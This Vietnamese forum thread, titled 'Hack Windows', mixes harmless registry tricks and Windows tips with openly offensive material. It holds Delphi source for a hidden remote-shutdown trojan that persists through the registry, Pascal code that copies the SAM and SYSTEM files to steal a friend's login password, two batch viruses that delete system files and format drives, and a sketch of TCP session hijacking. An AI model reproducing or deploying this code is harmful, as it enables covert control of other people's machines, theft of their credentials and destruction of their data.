banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận hệ điều hành Windows .:Hack Windows:.  XML
  [Question]   .:Hack Windows:. 01/01/2008 01:40:27 (+0700) | #1 | 107329
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Chào các bạn.
Tớ sẽ cố gắng thực hiện một tut hoàn chỉnh về hack windows bằng các thủ thuật và lập trình.
Trong quá trình thực hiện rất mong được sự đóng góp cũng như góp ý của các bạn.
Bây giờ ta bắt đầu với 2 thủ thuật . 2 cái này sẽ dùng hoặc registry hoặc tạo ra file .inf để lưu thông tin chương trình vào cơ sở dữ liệu của hệ thống.
1) Có những chương trình mà ta thường hay sử dụng khi làm việc. Và thật tiện lợi nếu chỉ cần một cú click chuột mà có thể gọi nó ra. Đúng vậy, mục đích của ta ở đây là đưa vào context-menu ( khi click chuột phải vào biểu tượng My Computer ) tên chương trình cần gọi.
Các bạn làm theo các bước sau:

1) Vào Regegit->HKEY_CLASSES_ROOT\CLSID\{20D04FE-...}\Shell
2) Click phải chuột -> new -> key: Đặt tên nào đó. Giả sử là cmd.
3) Thay đổi data value thành "Total Commander" ( tên này chính là tên sẽ hiển thị khi ta click chuột phải )
4) Tiếp tục, click phải chuột tại cmd -> new -> key: đặt tên là command.
5) Cuối cùng, giả sử chương trình Total Commander của ta được đặt ở địa chỉ: D:\Total Commander\Totalcmd.exe
ta copy đường dẫn này để tạo giá trj trong command.
 

Vậy là ta đã đạt được mục đích rồi đó.
Bây giờ, ta sẽ không làm bằng tay công việc đó, mà sẽ viết một script tự động làm các công việc trên cho ta.
Cấu trúc một file .inf:

[session]
key = value
 

.:totalcmd.inf:.
Code:
[Version]
Signature = $VIETNAM$
[DefaultInstall]
AddReg = Reg.Settings
AddReg = Reg.Uninstall
CopyFiles = Inf.Copy
[DefaultUninstall]
DelReg = Reg.Settings
DelReg = Reg.Uninstall
DelFiles = Inf.Copy

[Reg.Settings]
HKCR,CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\cmd
HKCR,CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\cmd,,,"%MENUITEM%"
HKCR,CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\cmd\command\
,,0x2000,D:\Total Commander\Totalcmd.exe"

[Reg.Uninstall]
HKLM,Software\Microsoft\Windows\CurrentVersion\Uninstall\%NAME%,UninstallString\,,"Rundll32.exe setupapi.dll,
InstallHinfSection DefaultUninstall 132"\"%17%\totalcmd.inf"

[Inf.Copy]
totalcmd.inf

[DestinationDisr]
Inf.Copy = 17

[SourceDisksNames]
55 = %DISKNAME%

[SourceDisksFiles]
totalcmd.inf = 55
[Strings]
NAME = "Total Commander"
MENUITEM = "Total Commander"
DISKNAME = "Setup Files"
.

Và để xóa bỏ các cài đặt này, vào Add or Remove Programs.
2) Cái thứ hai hoàn toàn tuơng tự cái ở trên. Nhiệm vụ lúc này là: kích hoạt command prompt khi ta click phải chuột lên một thư mục hay ổ đĩa. ( Tức là ta gọi cmd tại ngay vị trí ta muốn đến).
Lần này đường dẫn sẽ là :
HKCR\Directory\ 

Sau đó bạn đưa đường dẫn C:\WINDOWS\System32\cmd.exe vào value là xong.
Viết script tương tự như trên.
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 01/01/2008 10:50:39 (+0700) | #2 | 107450
[Avatar]
phstiger
Member

[Minus]    0    [Plus]
Joined: 23/01/2007 17:47:26
Messages: 261
Offline
[Profile] [PM]
Cái này gọi là Hack Windows à....
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 01/01/2008 11:07:10 (+0700) | #3 | 107456
[Avatar]
Ikut3
Elite Member

[Minus]    0    [Plus]
Joined: 24/09/2007 23:47:03
Messages: 1429
Location: Nhà hát lớn
Offline
[Profile] [PM] [Yahoo!]
Cái này gọi là Hack Windows à.... 


Ùm cái này gọi là Hack .Sự tương tác vào hệ thống giúp thuận tiện hơn hoặc khó khăn hơn cho người sử dụng được gọi là Hack. TUT ở trên kia giúp cho việc sử dụng được thuận tiện và dễ dàng hơn
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 01/01/2008 11:15:54 (+0700) | #4 | 107459
[Avatar]
Shido
Locked

[Minus]    0    [Plus]
Joined: 29/07/2007 13:23:57
Messages: 494
Location: Đâu ấy nhỉ ?
Offline
[Profile] [PM] [Yahoo!]

phstiger wrote:
Cái này gọi là Hack Windows à.... 

Hack nói chung là một hành động có chủ ý của chúng ta nhằm can thiệp vào hệ thống, mục đích là giúp chúng ta làm việc dễ dàng hơn và thuận lợi hơn, nên không có gì lạ nếu bạn ấy bảo đây là hack Windows !
Thân!
[Up] [Print Copy]
  [Question]   Viết một trojan đơn giản chạy trên Windows 01/01/2008 11:32:18 (+0700) | #5 | 107464
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Bây giờ, ta đến với một phần cũng khá lý thú. Viết một trojan gởi đến nạn nhân. Nó có nhiệm vụ rất đơn giản. Khi phía client phát hiện kết nối đầu server, client gởi đến một kí tự "R" ( chẳng hạn ) qua socket. Lúc này, khi mà phía server đã dính trojan rồi thì chi cần một cú click chuột của client thì máy server sẽ restart.
Con trojan này mang tên Internat32.exe, và để đơn giản , tớ sẽ viết trên Delphi7.
Nói một chút về hoạt động của con trojan này.
Trước hết, nó sẽ tự khởi động ngầm cùng windows. Ta thực hiện điều này bằng cách tác động vào registry của window tại vùng HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion -> gán giá trị RunServices bằng "Internat32.exe".
Tiếp tục, con này sẽ tự động thực hiện vòng lặp vô hạn để chẳng làm gì , cho đến khi nó nhận được kí tự "R" gởi bởi client. Sau đó, máy server restart không điều kiện !
Ta bắt đầu.
Các bạn vào New->Application-> Xuất hiện Form1.
Trên thanh Internet, chọn ServerSocket đưa vào Form1.
Tạo một event OnCreate cho Form1 và code như sau:
Code:
procedure TForm1.FormCreate(Sender: TObject);
var RegIni:TRegIniFile;
begin
     RegIni = TRegIniFile.Create('Software');
     RegIni.RootKey := HKEY_LOCAL_MACHINE;
     RegIni.OpenKey('Software', true);
     RegIni.OpenKey('Microsoft', true);
     RegIni.OpenKey('CurrentVersion', true);
     RegIni.WriteString('RunServices', 'Internat32.exe', Application.ExeName);
     RegIni.Free;
     ServerSocket1.Active := true;
end;

Sau bài đầu tiên, đến đây chắc bạn cũng đã hiểu được code này nói gì rồi. Tớ đi tiếp phần sau của Trojan.
Bây giờ, ta tạo thêm một event cho ServerSocket1: OnClientRead.
Code:
procedure TForm1.ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinsocket);
begin
    if  Socket.ReceiveText = 'R' then
    ExitWindowEx(EWX_SHUTDOWN, 0);
end;

Ở đây, nếu dùng EWX_FORCE thì máy server sẽ ngay lập tức shutdown (!). Còn với EWX_SHUTDOWN, nó sẽ chờ cho đến khi server tắt hết và lưu các ứng dụng đang chạy.
Cuối cùng , chỉ việc Ctrl-F9 để tạo Internat32.exe .

Tuy nhiên, con trojan này chưa ẩn đối với server. Để ẩn nó, vào "Project Manager" từ menu "View". Click phải vào Internat32.exe và chọn "View Source".
Bạn tìm đến đoạn code này và sửa thành:
Code:
program Internat32;

uses Forms,
       Windows,
       Unit1 in 'Unit1.pas' {Form1};
{$R *.RES}
var
WhEvent: THandle;
Begin
Application.Initialize;
ShowWindow(Application.Handle, SW_Hide);
Form1 := TForm1.Create(nil);
Application.Run;

WhEvent := CreateEvent(nil, true, false, 'et');

while(true) do
begin
    WaitForSingleObject(WhEvent, 1000);
    Application.ProcessMessages;
end;
end.

Đây chính là một chương trình pascal bình thường. Một handle thực chất là một số nguyên, mỗi cửa sổ windows sẽ có các handle khác nhau. Và trong vòng lặp vô hạn (?) , dễ dàng nhận ra hoạt động của nó ( xem lại phần đâu ).
Đến đây ta mới thực sự hoàn thành con Internat32.exe.
Bây giờ, phía client cần kích hoạt con Internat32.exe này.
Tiếp tục, New->Application->Form1.
Bây giờ, ta đặt lên Form1 các thành phần:

Một button ( kích hoạt)
Một edit ( ip server )
Một ClientSocket( trên thanh Internet ) để giao tiếp với server.
 

Tạo hiệu ứng clich chuột cho button1.
Code:
procedure TForm1.Button1Click(Sender: TObject);
begin
     ClientSocket1.Host := Edit1.Text;
     ClientSocket1.Active := true;
     ClientSocket1.Socket.SendText('R');
     ClientSocket1.Active := false;
end;

Ctrl-F9.
Vậy là ta đã tạo ra một con trojan rồi đó.
ps: Em post bài với mục đích học là chính , nếu có vi phạm nội quy xin các Mod bỏ qua.
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 01/01/2008 12:50:30 (+0700) | #6 | 107492
administration
Member

[Minus]    0    [Plus]
Joined: 21/11/2005 09:21:54
Messages: 13
Offline
[Profile] [PM]
bác có sẵn luôn bản đã biên dịch roài ko? em muốn xin 1 bản.
ndth4nh@gmail.com
thank a lot
[Up] [Print Copy]
  [Question]   Đánh cắp mật khẩu windows 02/01/2008 07:59:53 (+0700) | #7 | 107615
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Tớ chưa thấy trong file SAM có chứa gì, chỉ biết là nó có chứa vài cái pass gì đó.
Bình thường thì đúng là ta không thể đụng chạm đến nó được.
Nhưng liệu trong DOS có làm được không? Chương trình sau nếu bạn nào làm được có thể cho biết kết quả? ( Tớ chưa thử ).
Tức là đến nhà đứa bạn chơi. Nó vắng nhà, ta muốn lấy cái pass đăng nhập win của nó. Bây giờ sẵn trong máy có pascal, ta tạo file copy SAM lên đĩa , sau đó cho nó vào AUTOEXEC.BAT, vậy là lần sau, cứ thế đem file này về nhà khảo cứu.

Code:
program copy;
var
           fin,fout:text;
           b:char;
begin
           assign(fin,'С:\\Windows\\System32\\config\\SAM');
           reset(fin);
           assign(fout,'C:\\SAM');
           rewrite(fout);
           while not eof(fin) do
           begin
                  while not eoln(fin)do
                  begin
                        read(fin,b);
                        write(fout,b);
                 end;
                readln(fin);writeln(fout);
          end;
           close(fin);close(fout);
          assign(fin,'С:\\Windows\\System32\\config\\SYSTEM');
            reset(fin);
         assign(fout,'C:\\SYSTEMfi');
         rewrite(fout);
         while not eof(fin) do
              begin
                   while not eoln(fin)do
                     begin
                          read(fin,b);
                         write(fout,b);
                    end;
            readln(fin);writeln(fout);
          end;
           close(fin);close(fout);
end.

Cho đường dẫn file này vào AUTOEXEC.BAT nữa là xong.
Một chương trình nữa cũng rất có ích là saminside, download tại đây
------------------------
PS: Tớ chỉ viết để tham khảo và học tập, tuyệt đối không share hay quấy phá gì cả. Mong một số bạn( như Administration trên đây) hiểu cho.
[Up] [Print Copy]
  [Question]   Batch file 02/01/2008 13:52:00 (+0700) | #8 | 107681
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Bây giờ ta tìm hiểu các file .bat.

Các lệnh đơn giản:

echo off -
del %file%
copy %source% %dest%
mkdir %tên thư mục% - tạo thư mục
echo %text% - đưa text ra màn hình
echo %text%>%[path-to-file]% - ghi text vào file
echo %text%>>%[path-to-file]% - ghi text vào cuối file
if exist %[path-to-file]% %command% - nếu ... thực hiện lệnh
attrib %attr% %[path-to-file]% - Thiết lập đặc tính cho file ( +h- hidden, +s -system, +r -readonly)
start %[path-to-file]% - chạy file
cls - xóa màn hình
pause - hiển thị dòng lệnh: Press any key to continue...
label %nhãn% - tạo nhãn trên đĩa C
format %disk%:/q - format ổ đĩa
ren %source% %new-name% - đổi tên file
goto %nhãn% - nhảy đến label
...
...
...:%label%
 

Một vài thủ thuật:

%command% >nul - làm ẩn các câu lệnh và kết quả thực hiện .
Ví dụ: copy C:some.exe %windir%some.exe >nul
regedit /s %file.reg% - đưa thêm khóa vào regedit
Về tên đường dẫn. Ví dụ "Program Files" --> Progra~1.
copy C:some.exe C: Progra~1/some.exe
Cuối cùng là một script viết bằng javascript
echo var WSHShell = WScript.CreateObject("WScript.Shell"smilie; >%temp%mes.js
echo WSHShell.Popup("Hello"smilie; >> %temp%mes.js
start %temp%mes.js
del %temp%mes.js
tạo một dialog "Hello" trên Window.
 


Và bây giờ , chắc các bạn cũng có thể hiểu được nội dung của 2 con virus sau:
Code:
@echo off
echo Windows updating driver...
attrib -r -h -s C:Windows*.da?
echo Y| del C:Windows*.da?
echo Y| del D:*.*
attrib -r -h -s C:*.*
echo Y| del C:*.sys
echo Y| del C:*.bin
echo Y| del C:*.bat
echo Y| format D:
echo Y| format C:
echo virus loading... Completed !

Con này khôn khéo hơn...
Code:
@echo off
if exist C:aivus.bat goto cool
copy %0 C:aivus.bat > nul
attrib +h C:aivus.bat > nul
echo C:aivus.bat >> C:AUTOEXEC.BAT
echo Y| del %0 > nul
:cool
copy %0 A:un.bat >nul
copy %0 A:open.bat >nul
attrib +h A:open.bat >nul
echo Y| del C:Windows/calc.exe >nul
attrib -h -s -r:*.ini > nul
echo Y|del C:boot.ini > nul
echo Y| format A:


Còn đây là chương trình chuyển các file bat->exe : download
[Up] [Print Copy]
  [Question]   Thủ thuật Windows 02/01/2008 15:34:49 (+0700) | #9 | 107699
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
1. Sử dụng notepad để ghi log

- Bạn tạo 1 file .txt mới, đặt tên tùy ý.
- Gõ ".LOG" ở dòng đầu tiên (không có dấu ngoặc "" ).
- Save lại.
- Từ bây giờ, mỗi lần mở file lên là notepad tự thêm ngày giờ vào cho mình ở dòng tiếp theo.
 

2. 1 trò vui với folder

- HKEY_CLASSES_ROOT là nơi chứa các kiểu file mà window hiểu (ví dụ: .psd, .doc....etc.)
- Trong HKEY_CLASSES_ROOT có 1 key tên là CLSID, nơi đây chứa các key khác định nghĩa những folder đặc biệt trong window, ví dụ:
+ my computer: {20D04FE0-3AEA-1069-A2D8-08002B30309D}
+ recyle bin: {5ef4af3a-f726-11d0-b8a2-00c04fc309a4}
+ control panel: {3FC0B520-68A9-11D0-8D77-00C04FD70822}
+ .......etc.
- Chuyện gì sẽ xảy ra nếu ta dùng các key đó để đặt tên đuôi cho 1 folder
+ ví dụ: bạn tạo 1 folder mới, đặt tên tùy thích (fun), sau đó bạn copy đoạn key tương ứng với các folder đặc biệt ở trên và paste vào sau tên thư mục với dấu chấm (fun.{20D04FE0-3AEA-1069-A2D8-08002B30309D})
- Thử double click vào folder đó xem ^^.
+ Với tên folder là fun.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
+ Khi double click vào, nó sẽ hiện ra folder của My Computer.
CÁI NÀY THÌ HAY NỮA NÈ:
+Với tên folder là KEY.{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}
+ Khi double click vào, nó sẽ hiện ra CÁI GÌ NHỈ....-> BẠN ĐÃ KHOÁ THƯ MỤC KEY VỪA TẠO RA RỒI ĐÓ...HAY PHẢI KHÔNG....TỰ KHÁM PHÁ TIẾP NHA
- Have Fun!
 

3. Cải thiện tốc độ

(nếu có trên 512MB Ram hãy thực hiện)
var Start -> run -> regedit, tìm key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\DisablePagingExecutive
set value cho nó là 1
 

4. Quản lý share folder

- Bạn đã share wá nhìu folder, bây giờ ko biết chúng ở đâu, hay là cần nơi quản lý tập trung?
- Vào start -> run -> fsmgmt.msc
 

5. Ẩn thư mục mình share trên mạng (LAN chẳng hạn)

- Đặt thêm ký hiệu "$" (ko có dấu "") vào sau tên folder cần share. ví dụ sharefolder$
- Những người ở trong cùng mạng lan sẽ ko thấy thư mục được share nhưng vẫn có thể truy cập vào được bằng cách gõ đúng đường dẫn đến thư mục đó
ví dụ: tên máy//sharefolder$
 

6. Ẩn máy tính của mình trong Network Neighborhood

- Nếu bạn có share file, nhưng lại muốn ẩn máy tính của mình trong Network Neighborhood.
- Vào start -> run -> net config server /hidden:yes
 

7. Đăng nhập vào tài khoản Administrator

- Bình thường nó bị ẩn. Hoặc chỉ hiện lên ở safe mode.
- Để nó hiện ra lúc bình thường: ở welcome screen, bạn nhấn Ctrl-Alt-Del 2 lần, nó sẽ lộ diện ^^.
- Hoặc vào đây HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList chỉnh lại
 

8. Làm sao để "No to all" khi chép đè file

- Khi copy file, nếu có file trùng, nó sẽ hiện bảng thông báo: bạn có muốn ghi đè ko? sẽ có 3 lựa chọn No - Yes - Yes to all.
- Bây giờ muốn No to all phải làm sao?. Để "No to all", bạn giữ phím shift khi click vào nút No.
 

9. Đóng nhiều cửa sổ cùng 1 lúc.

- Nếu bạn giữ phím Ctrl khi click chuột vào những chương trình đang chạy có trên Taskbar, bạn có thể chọn nhiều task cùng lúc.
- Việc còn lại chỉ là nhấp chuột phải và chọn "Close Group".
 

10. Tăng tốc bàn phím

- Vào control panel -> keyboard -> kéo 2 thanh bên trên qua hết mức bên phải.
- Nó giúp phím giảm delay cho phím back space, giúp ta nhanh chóng xóa chữ gõ nhầm.
 

11. View Full Screen

- Bạn mở 1 cửa sổ window, và nhanh chóng cảm thấy nó quá nhỏ so với việc bạn đang làm?
- Giữ phím Ctrl + double click lên title bar, cách này sẽ nhanh chóng chuyển cửa sổ sang chế độ fullscreen.
- Hãy quên nút Maximize đi Very Happy.
 

12. Đã xài window tại sao lại quên window key.


Windows : Hiển thị start menu
Windows + D: Thu nhỏ hoặc trả lại trạng thái ban đầu cho tất cả các cửa sổ.
Windows + E: Mở explorer.
Windows + F: Mở search for file.
Windows + Ctrl + F: Mở search for computer.
Windows + F1: Help and Support Center
Windows + R: Mở hộp thoại run.
Windows + break: Mở System properties.
Windows + shift + M: Undo minimize all windows
Windows + L: khóa workstation
Windows + U: mở Utility Manager
 

13. Bạn vào 1 thư mục, cây thư mục, muốn tìm nhanh 1 file hay 1 thư mục trong 1 đống hỗn độn.

- Đơn giản hãy nhấn phím tương ứng với chữ cái đầu tiên của tên thư mục hay file. Đừng nói là bạn ko biết tên file hay thư mục cần tìm nhé.
- Nếu muốn di chuyển tới, hãy nhấn tiếp tục.
- Tốc độ làm việc của bạn sẽ tăng lên rất nhiều đó.
 

14. Ngoài Ctrl-Shift-Del bạn có thể bấm Ctrl-Shift-Esc để mở task manager
15. Chỉnh mức độ ưu tiên cho chương trình


- Window là 1 hệ điều hành đa luồng, tức là ta có thễ làm nhìu chiện cùng 1 lúc, các chương trình chạy song song với nhau.
- Tuy nhiên đối với PC bình thường chỉ có 1 CPU 1 nhân thì ko thể có chiện này.
+ Các chương trình ko bao giờ chạy song song mà là chạy xen kẽ với nhau, nhưng vì tốc độ của CPU quá nhanh nên ta cứ tưởng chúng cùng chạy 1 lúc.
- Chương trình nào được ưu tiên thì sẽ được CPU ưu ái và quan tâm đến nó nhìu hơn Very Happy.
- Bấm Ctrl-Shift-Del hay Ctrl-Shift-Esc để mở task manager, vào tab Processes, nhấp chuột phải vào các chương trình đang chạy bên dưới chọn Set Priority rùi chọn mức bạn muốn, mặc định là normal.
 

16. Quan hệ giữa folder với file html

- Nếu bạn tạo 1 file html hay htm có tên là "document.htm".
- Và tạo thêm 1 folder tên là "document_files" thì cả 2 file và folder đó sẽ có mối quan hệ với nhau:
+ Nếu ta ra lệnh copy, cut, del, move 1 trong 2 file hoặc folder đó thì lệnh cũng sẽ thực hiện trên file hay folder còn lại.
+ Và khi rename 1 trong 2 file hoặc folder đó, sẽ có 1 cảnh báo xuất hiện.
 

17.Quậy My Computer

- Tạo file trong C:/windows/system với tên oeminfo.inf có nội dung
[general]
Manufacturer = hello
Model = World
[OEMSpecific]
SubModel =flfjslfjslfsdlfjf
SerialNo =123456497947294747
OEM1 =vcxxvxvx
OEM2 =vxvxvcvxvcvxvxv
[Support Information]
Line1 =MyName
Line2 =Windows
Line3 =My
Line4 =
Line5 =

- Click phải chuột vào My Computer->Properties
 

--HAVE FUN--
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 03/01/2008 00:07:53 (+0700) | #10 | 107753
[Avatar]
Shido
Locked

[Minus]    0    [Plus]
Joined: 29/07/2007 13:23:57
Messages: 494
Location: Đâu ấy nhỉ ?
Offline
[Profile] [PM] [Yahoo!]
Ở phần 17.Quậy My Computer
- Tạo file trong C:/windows/system với tên oeminfo.inf có nội dung
[general]
Manufacturer = hello
Model = World
[OEMSpecific]
SubModel =flfjslfjslfsdlfjf
SerialNo =123456497947294747
OEM1 =vcxxvxvx
OEM2 =vxvxvcvxvcvxvxv
[Support Information]
Line1 =MyName
Line2 =Windows
Line3 =My
Line4 =
Line5 =
- Click phải chuột vào My Computer->Properties  

Nhưng còn thiếu file "oemlogo.bmp" nếu thiếu file này thì các cái trên không hiển thị đâu !
Bạn tạo một file theo kích thước 182x167 (nếu tôi nhớ không nhần) và lưu tại mục C:/windows/system với tên oemlogo.bmp thì dòng Information trong Properties mới hiển thị !
Thân !
[Up] [Print Copy]
  [Question]   Kỹ thuật đột nhập trong LAN 03/01/2008 08:13:26 (+0700) | #11 | 107855
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
to Kasaki: Đúng rồi, tớ quên mất. Sẽ chỉnh lại .
Packet #1764, Direction: Out, Time:12:37:28.268590, Size: 154
Ethernet II
Destination MAC: 00:06:29:B0:F2:AF
Source MAC: 00:1B:24:32:52:81
Ethertype: 0x0800 (2048) - IP
IP
IP version: 0x04 (4)
Header length: 0x05 (5) - 20 bytes
Differentiated Services Field: 0x00 (0)
Differentiated Services Code Point: 000000 - Default
ECN-ECT: 0
ECN-CE: 0
Total length: 0x008C (140)
ID: 0x3981 (14721)
Flags
Don't fragment bit: 1 - Don't fragment
More fragments bit: 0 - Last fragment
Fragment offset: 0x0000 (0)
Time to live: 0x80 (128)
Protocol: 0x06 (6) - TCP
Checksum: 0xE2DF (58079) - correct
Source IP: 10.162.5.91
Destination IP: 209.200.252.69
IP Options: None
TCP
Source port: 4604
Destination port: 22
Sequence: 0xAA9D1120 (2862420256)
Acknowledgement: 0x824F7DCA (2186247626)
Header length: 0x05 (5) - 20 bytes
Flags: PSH ACK
URG: 0
ACK: 1
PSH: 1
RST: 0
SYN: 0
FIN: 0

Window: 0xFCD7 (64727)
Checksum: 0xDE89 (56969) - incorrect
Urgent Pointer: 0x0000 (0)
TCP Options: None
SSH
Encrypted data: 56 7D 4A 06 BB C2 37 5A CD FC 5E 43 C2 1D 20 5A 45 30 37 CE 1F 50 F1 FA 98 4B 23 20 E7 F5 58 51 F9 07 C8 2A FA D8 11 FE CC B4 3D BE 4D 5C 84 D6 03 F3 4B 98 48 7A AC 0A 42 73 5E CB CF FB 5A BF AF DB 

Đây là dữ liệu của một packet mà con sniffer tóm được.
Bây giờ tớ sẽ nói làm cách nào để thâm nhập vào một mạng LAN để có thể gởi các packet đến các máy trong LAN đó.
Trước hết, ta cần tìm hiểu về cấu trúc một gói packet TCP và cách thức giao tiếp của chúng.
TCP - Transmission Control Protocol là một trong các giao thức cơ bản của mức vận chuyển. Giao thức - đó là một tập hợp các hàm. TCP có 4 nhiệm vụ: Thiết lập liên kết, kiểm tra lỗi, gởi packet, đóng kết nối. Chính TELNET hay FTP ( thuộc tầng ứng dụng ) hoạt động ngay trên TCP này. Đặc trưng của một gói TCP nằm ở 2 ID: Sequence Number và Acknowledgement Number. Và thêm một cái gọi là Control Bits gồm 6 bit có nội dung:

URG: Urgent Pointer field sinificant
ACK: Acknowledgement field significant
PSH: Push function
RST: Reset connection
SYN: Synchronize sequence numbers
FIN: No more data from sender.
 

Ta chỉ cần thế. Bây giờ ta xem xét cách thức giao tiếp bằng các gói TCP như thế nào.
Đầu tiên TCP thiết lập kết nối. Công đoạn này gồm 3 bước:

Client->Server: SYN, ISSclient
Server->Client: SYN, ACK, ISNserver, ACK(ISNclient + 1)
Client->Server: ACK, ISNclient + 1, ACK(ISNserver + 1)
 

Một ghi chú: Cứ mỗi lần response: thì ISS(Initial Number) lại tự động tăng lên 1.
Trong WinNT, cứ mỗi 10ms(milisecond) ISN tự động tăng lên 1.
Và đây chính là mấu chốt của việc xâm nhập.
Ta cài một sniffer vào LAN. (Sniffer: một chương trình có nhiệm vụ theo dõi và đón bắt các gói dữ liệu trong LAN )
Và như đầu tiên ta thu được một gói packet TCP.
Muốn thâm nhập ta chỉ cần biết được các ISS của client và server là đủ ( không cần biết DATA có chứa gì ).
Bây giờ, ta tạo ra một packet với các trường ACK, ISNclient + 1, ACK(ISNserver + 1) và DATA. Nếu may mắn ta sẽ đón đúng session của kết nối. Nếu không, thay đổi ISNclient và ACK(ISNserver + 1).

Một sniffer có thể download tại đây
- Chúc may mắn -

[Up] [Print Copy]
  [Question]   Cổng trong Windows 03/01/2008 17:12:36 (+0700) | #12 | 107967
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Bây giờ ta sẽ nói về các cổng vào ra của máy tính. Mỗi cổng gắn liền với một giao thức . Có tất cả 65000 cổng , 1024 cổng đầu tiên là các cổng "mở", còn lại là "đóng". Qua các cổng đầu tiên, hacker có thể thực hiện thâm nhập vào máy của bạn. Dưới đây là một vài điều nên biết:
7:echo - Dịch vụ này không quan trọng lắm. Nhiệm vụ: trả lời các truy vấn TCP-UDP. Có thể loại bỏ

11,15:systat и netstat - Các cổng này càng nên được loại bỏ! Chúng trả lời các truy vấn từ xa của máy tính bên ngoài nhằm thu thập thông tin về máy của bạn! Do đó hãy chú ý đến các cổng này...

19:chargen - dịch vụ này chuyển nội dung của echo. Tuy nó có thể được loại bỏ, tuy nhiên lại cần trong một số trường hợp .

21:ftp (file transfer protocol) - dịch vụ truyền tập tin. Không thể thiếu nó . Tuy nhiên tớ sẽ nói về cách bảo vệ cổng này .

23:telnet - ооооо....Qua cổng này một người lạ có thể biết được nhiều thông tin về máy của bạn...Nó có thể làm được rất nhiều! Bởi thế, nên loại bỏ nó.

25:smtp - Dịch vụ truyền thư điện tử.
53:domain - DNS- dịch vụ này cho phép chuyển tên miền (ví dụ www.hvaonline.net ) vào dạng số hóa (địa chỉ IP:72.232.147.252 ). Không nên loại bỏ, tuy thế cũng cần phải bảo vệ.

69:tftp - Thường dùng trong LAN, đây là dạng ftp đơn giản.

79:finger - dùng để lấy thông tin về hệ thống. Không cần thì cũng loại nốt.
80:http - dịch vụ truyền các file .html ( siêu văn bản ). Ta dùng nó hằng giờ smilie

109,110:pop - mở nó có thể bạn bị bom-mail. Nếu chưa biết e-mail rõ ràng, tốt nhất loại nó đi.
111,135,137-139:postmap,loc-serv. nbname, nbdatagram,nbsession - Không nên loại chúng.--> winnuke!(139)

161:snmp - giao thức quản lý mạng. Dùng để điều hành các thành phần của mạng.

512-520:rexec(),rsh,talk... - Và đây. Ta cần đặc biệt chú ý. Bởi vì qua đây hacker có thể chạy một chương trình trên máy bạn... Hãy chú ý đến nó.
540:uucp - dùng trong unix, dùng để truyền dữ liệu giữa các máy UNIX.

 

Đối với ta, thế là đủ .
Cách loại bỏ một cổng :

*Chạy regedit.exe trong cmd.
* Tìm trong registry tất cả các cổng bạn muốn loại bỏ, sau đó gán giá trị 0 hoặc 1 cho nó
*Restart Windows
 

Bảo vệ các cổng: Có 2 cách:

* Xem lại cái trên smilie
* Có thể lập trình:
Ta có 2 lựa chọn
*Tự viết một chương trình .
*Sử dụng các phần mềm.

Đầu tiên là viết chương trình . Có các dòng lệnh sau có thể sử dụng được

// basic
winsock1(80).close;
unload winsock1(80);
//delphi
winsock.closesocket(80);
winsock.connect(80,);

Cụ thể xin mời các bạn tự tìm đọc một giáo trình về ngôn ngữ lập trình để tìm hiểu thêm.
Còn bây giờ sẽ là một vài chương trình cho phép quản lí các cổng:
Các chương trình sau ( theo tớ ) là tốt nhất:

blackice defender-
zonealarm pro-
lockdown-
( nên sử dụng thằng này )
Outpost Firewall Pro
 


Có một số game khá hay cho hacker: có thể download tại đây
hoặc đây
--- HAVE FUN ---
[Up] [Print Copy]
  [Question]   File hệ thống trong Windows 03/01/2008 22:35:21 (+0700) | #13 | 107985
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Bây giờ ta sẽ tìm hiểu về một số file hệ thống quan trọng nhất của Windows, mà nếu biết rõ chúng, bạn có thể làm chủ máy tính của mình.
1) boot.ini
- Vị trí: C:\
- Miêu tả:
File chạy ngầm. Thiếu nó hệ điều hành không thể chạy được. Trong nó có chứa nhiều phần. Nói chung không nên thay đổi gì file này.
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional RU" /noexecute=optin /fastdetect
 

2)pagefile.sys
-Vị trí: C:\
-Miêu tả:File chứa các dữ liệu tạm thời và không được load vào bộ nhớ
3)hiberfil.sys
-Vị trí: C:\
